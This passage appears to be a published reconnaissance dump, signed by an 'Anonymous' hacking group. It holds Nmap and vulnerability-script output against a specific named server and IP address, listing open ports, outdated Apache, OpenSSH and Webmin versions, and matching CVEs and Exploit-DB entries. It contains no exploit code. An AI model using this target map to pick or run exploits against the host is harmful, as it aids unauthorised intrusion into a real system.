18926| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
18927|_
443/tcp open ssl/http Apache httpd 2.4.10 ((Debian))
18929|_http-server-header: Apache/2.4.10 (Debian)
18930| vulners:
18931| cpe:/a:apache:http_server:2.4.10:
18932| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
18933| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
18934| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
18935| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
18936| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
18937| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
18938| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
18939| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
18940| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
18941| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
18942| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
18943| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
18944| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
18945| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
18946| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
18947| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
18948| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
18949| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
18950| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
18951| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
18952| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
18953|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
18954| vulscan: VulDB - https://vuldb.com:
18955| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
18956| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
18957| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
18958| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
18959| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
18960| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
18961| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
18962|
18963| MITRE CVE - https://cve.mitre.org:
| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
| [15177] PHP Apache 2 Local Denial of Service Vulnerability
| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
| [5485] Apache 2.0 Path Disclosure Vulnerability
| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [75211] Debian GNU/Linux apache 2 cross-site scripting
|
| Exploit-DB - https://www.exploit-db.com:
| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
| [21719] Apache 2.0 Path Disclosure Vulnerability
| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
| [17691] Apache Struts < 2.2.0 - Remote Command Execution
| [15319] Apache 2.2 (Windows) Local Denial of Service
| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
| [9] Apache HTTP Server 2.x Memory Leak Exploit
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [855524] Solaris Update for Apache 2 120544-14
| [855077] Solaris Update for Apache 2 120543-14
| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [72626] Debian Security Advisory DSA 2579-1 (apache2)
| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
| [71256] Debian Security Advisory DSA 2452-1 (apache2)
| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
| [70724] Debian Security Advisory DSA 2405-1 (apache2)
| [70235] Debian Security Advisory DSA 2298-2 (apache2)
| [70233] Debian Security Advisory DSA 2298-1 (apache2)
| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
| [69338] Debian Security Advisory DSA 2202-1 (apache2)
| [65131] SLES9: Security update for Apache 2 oes/CORE
| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
| [11092] Apache 2.0.39 Win32 directory traversal
| [66081] SLES11: Security update for Apache 2
| [66074] SLES10: Security update for Apache 2
| [66070] SLES9: Security update for Apache 2
| [65893] SLES10: Security update for Apache 2
| [65888] SLES10: Security update for Apache 2
| [65510] SLES9: Security update for Apache 2
| [65249] SLES9: Security update for Apache 2
| [65230] SLES9: Security update for Apache 2
| [65228] SLES9: Security update for Apache 2
| [65207] SLES9: Security update for Apache 2
| [65136] SLES9: Security update for Apache 2
| [65017] SLES9: Security update for Apache 2
|
| SecurityTracker - https://www.securitytracker.com:
| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
|
| OSVDB - http://www.osvdb.org:
| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
|_
10000/tcp open http MiniServ 1.910 (Webmin httpd)
| vulscan: VulDB - https://vuldb.com:
| No findings
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2005-3912] Format string vulnerability in miniserv.pl Perl web server in Webmin before 1.250 and Usermin before 1.180, with syslog logging enabled, allows remote attackers to cause a denial of service (crash or memory consumption) and possibly execute arbitrary code via format string specifiers in the username parameter to the login form, which is ultimately used in a syslog call. NOTE: the code execution might be associated with an issue in Perl.
| [CVE-2005-3042] miniserv.pl in Webmin before 1.230 and Usermin before 1.160, when "full PAM conversations" is enabled, allows remote attackers to bypass authentication by spoofing session IDs via certain metacharacters (line feed or carriage return).
| [CVE-2005-0427] The ebuild of Webmin before 1.170-r3 on Gentoo Linux includes the encrypted root password in the miniserv.users file when building a tbz2 of the webmin package, which allows remote attackers to obtain and possibly crack the encrypted password.
| [CVE-2003-0101] miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000 does not properly handle metacharacters such as line feeds and carriage returns (CRLF) in Base-64 encoded strings during Basic authentication, which allows remote attackers to spoof a session ID and gain root privileges.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| No findings
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [23277] Webmin miniserv.pl Web server component username format string
|
| Exploit-DB - https://www.exploit-db.com:
| No findings
|
| OpenVAS (Nessus) - http://www.openvas.org:
| No findings
|
| SecurityTracker - https://www.securitytracker.com:
| [1006161] Usermin Input Validation Flaw in 'miniserv.pl' May Let Remote Users Gain User or Root Access
| [1006160] Webmin Input Validation Flaw in 'miniserv.pl' May Let Remote Users Spoof Session IDs and Gain Root Access
|
| OSVDB - http://www.osvdb.org:
| [79044] Webmin miniserv.pl Unspecified Local Password Disclosure
| [21222] Webmin/Usermin miniserv.pl Format String Remote Code Execution
| [19575] Webmin/Usermin miniserv.pl Metacharacter PAM Authentication Bypass
| [13772] Gentoo Webmin miniserv.users Encrypted Root Password Remote Disclosure
| [10803] Webmin/Usermin miniserv.pl Base-64 String Metacharacter Handling Session Spoofing
| [1844] Webmin miniserv.pl Environment Variable Cleartext Password Local Disclosure
|_
Aggressive OS guesses: Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (94%), Linux 2.6.39 (93%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (93%), OpenWrt White Russian 0.9 (Linux 2.4.30) (93%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 30.003 days (since Fri Sep 6 00:04:24 2019)
Network Distance: 14 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   35.71 ms  10.246.204.1
2   37.55 ms  vlan102.as02.qc1.ca.m247.com (176.113.74.17)
3   47.92 ms  irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
4   46.13 ms  te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
5   58.60 ms  te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
6   39.42 ms  be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
7   128.68 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
8   128.71 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
9   128.72 ms be3457.ccr21.ams04.atlas.cogentco.com (130.117.1.10)
10  128.75 ms worldstream.demarc.cogentco.com (149.14.93.114)
11  128.77 ms 109.236.95.181
12  128.76 ms 190.2.158.155
13  128.78 ms 185.106.120.66
14  108.85 ms latina.petite.guru (185.82.200.52)

NSE: Script Post-scanning.
Initiating NSE at 00:08
Completed NSE at 00:08, 0.00s elapsed
Initiating NSE at 00:08
Completed NSE at 00:08, 0.00s elapsed
######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:08 EDT
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:08
Completed NSE at 00:08, 0.00s elapsed
Initiating NSE at 00:08
Completed NSE at 00:08, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:08
Completed Parallel DNS resolution of 1 host. at 00:08, 0.02s elapsed
Initiating UDP Scan at 00:08
Scanning latina.petite.guru (185.82.200.52) [15 ports]
Increasing send delay for 185.82.200.52 from 0 to 50 due to max_successful_tryno increase to 4
Increasing send delay for 185.82.200.52 from 50 to 100 due to max_successful_tryno increase to 5
Increasing send delay for 185.82.200.52 from 100 to 200 due to max_successful_tryno increase to 6
Completed UDP Scan at 00:08, 8.38s elapsed (15 total ports)
Initiating Service scan at 00:08
Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
Initiating Traceroute at 00:08
Completed Traceroute at 00:09, 7.05s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:09
Completed Parallel DNS resolution of 1 host. at 00:09, 0.00s elapsed
NSE: Script scanning 185.82.200.52.
Initiating NSE at 00:09
Completed NSE at 00:09, 0.00s elapsed
Initiating NSE at 00:09
Completed NSE at 00:09, 0.00s elapsed
Nmap scan report for latina.petite.guru (185.82.200.52)
Host is up (0.12s latency).

PORT     STATE    SERVICE      VERSION
53/udp   closed   domain
67/udp   closed   dhcps
68/udp   closed   dhcpc
69/udp   closed   tftp
88/udp   closed   kerberos-sec
123/udp  closed   ntp
137/udp  filtered netbios-ns
138/udp  filtered netbios-dgm
139/udp  closed   netbios-ssn
161/udp  closed   snmp
162/udp  closed   snmptrap
389/udp  closed   ldap
500/udp  closed   isakmp
520/udp  closed   route
2049/udp closed   nfs
Too many fingerprints match this host to give specific OS details
Network Distance: 14 hops

TRACEROUTE (using port 138/udp)
HOP RTT      ADDRESS
1   ... 4
5   18.58 ms 10.246.204.1
6   ... 7
8   17.77 ms 10.246.204.1
9   55.21 ms 10.246.204.1
10  55.20 ms 10.246.204.1
11  55.19 ms 10.246.204.1
12  55.17 ms 10.246.204.1
13  36.92 ms 10.246.204.1
14  19.02 ms 10.246.204.1
15  ... 18
19  17.91 ms 10.246.204.1
20  21.81 ms 10.246.204.1
21  ... 27
28  18.51 ms 10.246.204.1
29  ...
30  17.76 ms 10.246.204.1

NSE: Script Post-scanning.
Initiating NSE at 00:09
Completed NSE at 00:09, 0.00s elapsed
Initiating NSE at 00:09
Completed NSE at 00:09, 0.00s elapsed
#######################################################################################################################################
Hosts
=====

address        mac  name                os_name  os_flavor  os_sp  purpose  info  comments
-------        ---  ----                -------  ---------  -----  -------  ----  --------
185.82.200.52       latina.petite.guru  Linux                      server

Services
========

host           port   proto  name          state     info
----           ----   -----  ----          -----     ----
185.82.200.52  22     tcp    ssh           open      OpenSSH 6.7p1 Debian 5+deb8u8 protocol 2.0
185.82.200.52  53     udp    domain        closed
185.82.200.52  67     udp    dhcps         closed
185.82.200.52  68     udp    dhcpc         closed
185.82.200.52  69     udp    tftp          closed
185.82.200.52  80     tcp    http          open      Apache httpd 2.4.10 (Debian)
185.82.200.52  88     udp    kerberos-sec  closed
185.82.200.52  123    udp    ntp           closed
185.82.200.52  137    udp    netbios-ns    filtered
185.82.200.52  138    udp    netbios-dgm   filtered
185.82.200.52  139    udp    netbios-ssn   closed
185.82.200.52  161    udp    snmp          closed
185.82.200.52  162    udp    snmptrap      closed
185.82.200.52  389    udp    ldap          closed
185.82.200.52  443    tcp    ssl/http      open      Apache httpd 2.4.10 (Debian)
185.82.200.52  500    udp    isakmp        closed
185.82.200.52  520    udp    route         closed
185.82.200.52  2049   udp    nfs           closed
185.82.200.52  10000  tcp    http          open      MiniServ 1.910 Webmin httpd
#######################################################################################################################################
 Anonymous JTSEC HunterUnit Full Recon #1